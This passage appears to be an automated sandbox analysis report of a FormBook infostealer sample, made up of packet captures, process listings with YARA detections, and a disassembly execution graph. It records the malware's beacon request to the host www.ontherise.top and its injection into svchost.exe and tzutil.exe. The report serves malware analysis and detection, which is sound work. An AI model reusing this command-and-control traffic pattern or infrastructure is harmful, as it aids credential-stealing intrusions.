                                                                Dec 11, 2024 15:05:30.482383966 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                Dec 11, 2024 15:05:30.482418060 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                Dec 11, 2024 15:05:30.482453108 CET1236INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                Dec 11, 2024 15:05:30.482513905 CET1236INData Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                                Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                                Dec 11, 2024 15:05:30.482552052 CET1236INData Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                                Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                                Dec 11, 2024 15:05:30.482665062 CET1236INData Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                                Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                                                Dec 11, 2024 15:05:30.482697964 CET1236INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33
                                                                Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                                Dec 11, 2024 15:05:30.482733965 CET556INData Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                                                Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
                                                                Dec 11, 2024 15:05:30.603434086 CET1236INData Raw: 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70
                                                                Data Ascii: 000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4570" d="m 325,163.45184 c 1.66722,0.6259


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.749995162.0.213.94804508C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 11, 2024 15:05:31.834573984 CET495OUTGET /wr6c/?9rKHjDxP=P2ZEIELZ0UPa04kV9W8ohJ98vIa20Z9FlTIQAlVGqe01bp+GVEKkI1C60uSAlmlZ1ff3ZHYqpSh2Ykr2aNLluv5rxVbcwMo5N3ddLCq6QLz9p/hlfUxJPhq7oCzYOhUfK96Ibl0PndwU&rLx0p=06jDTp00Q HTTP/1.1
                                                                Host: www.ontherise.top
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                                Dec 11, 2024 15:05:33.099076033 CET1236INHTTP/1.1 404 Not Found
                                                                Date: Wed, 11 Dec 2024 14:05:32 GMT
                                                                Server: Apache
                                                                Content-Length: 16052
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                Dec 11, 2024 15:05:33.099139929 CET224INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                                Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-
                                                                Dec 11, 2024 15:05:33.099172115 CET1236INData Raw: 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30
                                                                Data Ascii: 2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -
                                                                Dec 11, 2024 15:05:33.099205971 CET1236INData Raw: 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20
                                                                Data Ascii: -linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.6811
                                                                Dec 11, 2024 15:05:33.099240065 CET1236INData Raw: 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20
                                                                Data Ascii: troke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.74965
                                                                Dec 11, 2024 15:05:33.099272966 CET672INData Raw: 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b
                                                                Data Ascii: ll:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,
                                                                Dec 11, 2024 15:05:33.099307060 CET1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                                Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                                Dec 11, 2024 15:05:33.099369049 CET1236INData Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                                Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
                                                                Dec 11, 2024 15:05:33.099404097 CET448INData Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                                                                Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
                                                                Dec 11, 2024 15:05:33.099437952 CET1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                                Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                Dec 11, 2024 15:05:33.219177961 CET1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                                Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:09:02:30
                                                                Start date:11/12/2024
                                                                Path:C:\Users\user\Desktop\01152-11-12-24.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\01152-11-12-24.exe"
                                                                Imagebase:0x8f0000
                                                                File size:1'229'312 bytes
                                                                MD5 hash:BE474451D52CCC6038809F5308EFFB59
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:09:02:33
                                                                Start date:11/12/2024
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\01152-11-12-24.exe"
                                                                Imagebase:0xff0000
                                                                File size:46'504 bytes
                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1724224119.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1725678953.0000000005150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1725336677.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:10:12:54
                                                                Start date:11/12/2024
                                                                Path:C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe"
                                                                Imagebase:0x760000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3117803218.0000000004580000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:11
                                                                Start time:10:12:56
                                                                Start date:11/12/2024
                                                                Path:C:\Windows\SysWOW64\tzutil.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                                Imagebase:0x3a0000
                                                                File size:48'640 bytes
                                                                MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3117606831.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3117644043.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3114871979.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                General

                                                                Target ID:12
                                                                Start time:10:13:09
                                                                Start date:11/12/2024
                                                                Path:C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe"
                                                                Imagebase:0x760000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3119039119.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:16
                                                                Start time:10:13:21
                                                                Start date:11/12/2024
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff722870000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:3.5%
                                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                                  Signature Coverage:8.9%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:62
                                                                  execution_graph 104382 1415210 104396 1412e60 104382->104396 104384 14152d2 104399 1415100 104384->104399 104398 14134eb 104396->104398 104402 1416300 GetPEB 104396->104402 104398->104384 104400 1415109 Sleep 104399->104400 104401 1415117 104400->104401 104402->104398 104403 8f107d 104408 8f708b 104403->104408 104405 8f108c 104439 912d40 104405->104439 104409 8f709b __write_nolock 104408->104409 104442 8f7667 104409->104442 104413 8f715a 104454 91050b 104413->104454 104420 8f7667 59 API calls 104421 8f718b 104420->104421 104473 8f7d8c 104421->104473 104423 8f7194 RegOpenKeyExW 104424 92e8b1 RegQueryValueExW 104423->104424 104429 8f71b6 Mailbox 104423->104429 104425 92e943 RegCloseKey 104424->104425 104426 92e8ce 104424->104426 104425->104429 104438 92e955 _wcscat Mailbox __wsetenvp 104425->104438 104477 910db6 104426->104477 104428 92e8e7 104487 8f522e 104428->104487 104429->104405 104430 8f79f2 59 API calls 104430->104438 104433 92e90f 104490 8f7bcc 104433->104490 104435 92e929 104435->104425 104437 8f3f74 59 API calls 104437->104438 104438->104429 104438->104430 104438->104437 104499 8f7de1 104438->104499 104564 912c44 104439->104564 104441 8f1096 104443 910db6 Mailbox 59 API calls 104442->104443 104444 8f7688 104443->104444 104445 910db6 Mailbox 59 API calls 104444->104445 104446 8f7151 104445->104446 104447 8f4706 104446->104447 104503 921940 104447->104503 104450 8f7de1 59 API calls 104451 8f4739 104450->104451 104505 8f4750 104451->104505 104453 8f4743 Mailbox 104453->104413 104455 921940 __write_nolock 104454->104455 104456 910518 GetFullPathNameW 104455->104456 104457 91053a 104456->104457 104458 8f7bcc 59 API calls 104457->104458 104459 8f7165 104458->104459 104460 8f7cab 104459->104460 104461 8f7cbf 104460->104461 104462 92ed4a 104460->104462 104527 8f7c50 104461->104527 104532 8f8029 104462->104532 104465 8f7173 104467 8f3f74 104465->104467 104466 92ed55 __wsetenvp _memmove 104468 8f3f82 104467->104468 104472 8f3fa4 _memmove 104467->104472 104470 910db6 Mailbox 59 API calls 104468->104470 104469 910db6 Mailbox 59 API calls 104471 8f3fb8 104469->104471 104470->104472 104471->104420 104472->104469 104474 8f7da6 104473->104474 104476 8f7d99 104473->104476 104475 910db6 Mailbox 59 API calls 104474->104475 104475->104476 104476->104423 104480 910dbe 104477->104480 104479 910dd8 104479->104428 104480->104479 104482 910ddc std::exception::exception 104480->104482 104535 91571c 104480->104535 104552 9133a1 DecodePointer 104480->104552 104553 91859b RaiseException 104482->104553 104484 910e06 104554 9184d1 58 API calls _free 104484->104554 104486 910e18 104486->104428 104488 910db6 Mailbox 59 API calls 104487->104488 104489 8f5240 RegQueryValueExW 104488->104489 104489->104433 104489->104435 104491 8f7bd8 __wsetenvp 104490->104491 104492 8f7c45 104490->104492 104494 8f7bee 104491->104494 104495 8f7c13 104491->104495 104493 8f7d2c 59 API calls 104492->104493 104498 8f7bf6 _memmove 104493->104498 104563 8f7f27 59 API calls Mailbox 104494->104563 104497 8f8029 59 API calls 104495->104497 104497->104498 104498->104435 104500 8f7df0 __wsetenvp _memmove 104499->104500 104501 910db6 Mailbox 59 API calls 104500->104501 104502 8f7e2e 104501->104502 104502->104438 104504 8f4713 GetModuleFileNameW 104503->104504 104504->104450 104506 921940 __write_nolock 104505->104506 104507 8f475d GetFullPathNameW 104506->104507 104508 8f477c 104507->104508 104509 8f4799 104507->104509 104511 8f7bcc 59 API calls 104508->104511 104510 8f7d8c 59 API calls 104509->104510 104512 8f4788 104510->104512 104511->104512 104515 8f7726 104512->104515 104516 8f7734 104515->104516 104519 8f7d2c 104516->104519 104518 8f4794 104518->104453 104520 8f7d3a 104519->104520 104522 8f7d43 _memmove 104519->104522 104520->104522 104523 8f7e4f 104520->104523 104522->104518 104524 8f7e62 104523->104524 104526 8f7e5f _memmove 104523->104526 104525 910db6 Mailbox 59 API calls 104524->104525 104525->104526 104526->104522 104528 8f7c5f __wsetenvp 104527->104528 104529 8f8029 59 API calls 104528->104529 104530 8f7c70 _memmove 104528->104530 104531 92ed07 _memmove 104529->104531 104530->104465 104533 910db6 Mailbox 59 API calls 104532->104533 104534 8f8033 104533->104534 104534->104466 104536 915797 104535->104536 104546 915728 104535->104546 104561 9133a1 DecodePointer 104536->104561 104538 91579d 104562 918b28 58 API calls __getptd_noexit 104538->104562 104541 91575b RtlAllocateHeap 104542 91578f 104541->104542 104541->104546 104542->104480 104544 915733 104544->104546 104555 91a16b 58 API calls 2 library calls 104544->104555 104556 91a1c8 58 API calls 8 library calls 104544->104556 104557 91309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104544->104557 104545 915783 104559 918b28 58 API calls __getptd_noexit 104545->104559 104546->104541 104546->104544 104546->104545 104550 915781 104546->104550 104558 9133a1 DecodePointer 104546->104558 104560 918b28 58 API calls __getptd_noexit 104550->104560 104552->104480 104553->104484 104554->104486 104555->104544 104556->104544 104558->104546 104559->104550 104560->104542 104561->104538 104562->104542 104563->104498 104565 912c50 __setmode 104564->104565 104572 913217 104565->104572 104571 912c77 __setmode 104571->104441 104589 919c0b 104572->104589 104574 912c59 104575 912c88 DecodePointer DecodePointer 104574->104575 104576 912cb5 104575->104576 104577 912c65 104575->104577 104576->104577 104635 9187a4 59 API calls __setmode 104576->104635 104586 912c82 104577->104586 104579 912d18 EncodePointer EncodePointer 104579->104577 104580 912cec 104580->104577 104584 912d06 EncodePointer 104580->104584 104637 918864 61 API calls 2 library calls 104580->104637 104581 912cc7 104581->104579 104581->104580 104636 918864 61 API calls 2 library calls 104581->104636 104584->104579 104585 912d00 104585->104577 104585->104584 104638 913220 104586->104638 104590 919c1c 104589->104590 104591 919c2f EnterCriticalSection 104589->104591 104596 919c93 104590->104596 104591->104574 104593 919c22 104593->104591 104620 9130b5 58 API calls 3 library calls 104593->104620 104597 919c9f __setmode 104596->104597 104598 919cc0 104597->104598 104599 919ca8 104597->104599 104605 919ce1 __setmode 104598->104605 104624 91881d 58 API calls 2 library calls 104598->104624 104621 91a16b 58 API calls 2 library calls 104599->104621 104601 919cad 104622 91a1c8 58 API calls 8 library calls 104601->104622 104604 919cd5 104607 919ceb 104604->104607 104608 919cdc 104604->104608 104605->104593 104606 919cb4 104623 91309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104606->104623 104611 919c0b __lock 58 API calls 104607->104611 104625 918b28 58 API calls __getptd_noexit 104608->104625 104612 919cf2 104611->104612 104614 919d17 104612->104614 104615 919cff 104612->104615 104627 912d55 104614->104627 104626 919e2b InitializeCriticalSectionAndSpinCount 104615->104626 104618 919d0b 104633 919d33 LeaveCriticalSection _doexit 104618->104633 104621->104601 104622->104606 104624->104604 104625->104605 104626->104618 104628 912d5e RtlFreeHeap 104627->104628 104632 912d87 _free 104627->104632 104629 912d73 104628->104629 104628->104632 104634 918b28 58 API calls __getptd_noexit 104629->104634 104631 912d79 GetLastError 104631->104632 104632->104618 104633->104605 104634->104631 104635->104581 104636->104580 104637->104585 104641 919d75 LeaveCriticalSection 104638->104641 104640 912c87 104640->104571 104641->104640 104642 92fe27 104655 90f944 104642->104655 104644 92fe3d 104645 92fe53 104644->104645 104647 92febe 104644->104647 104744 8f9e5d 60 API calls 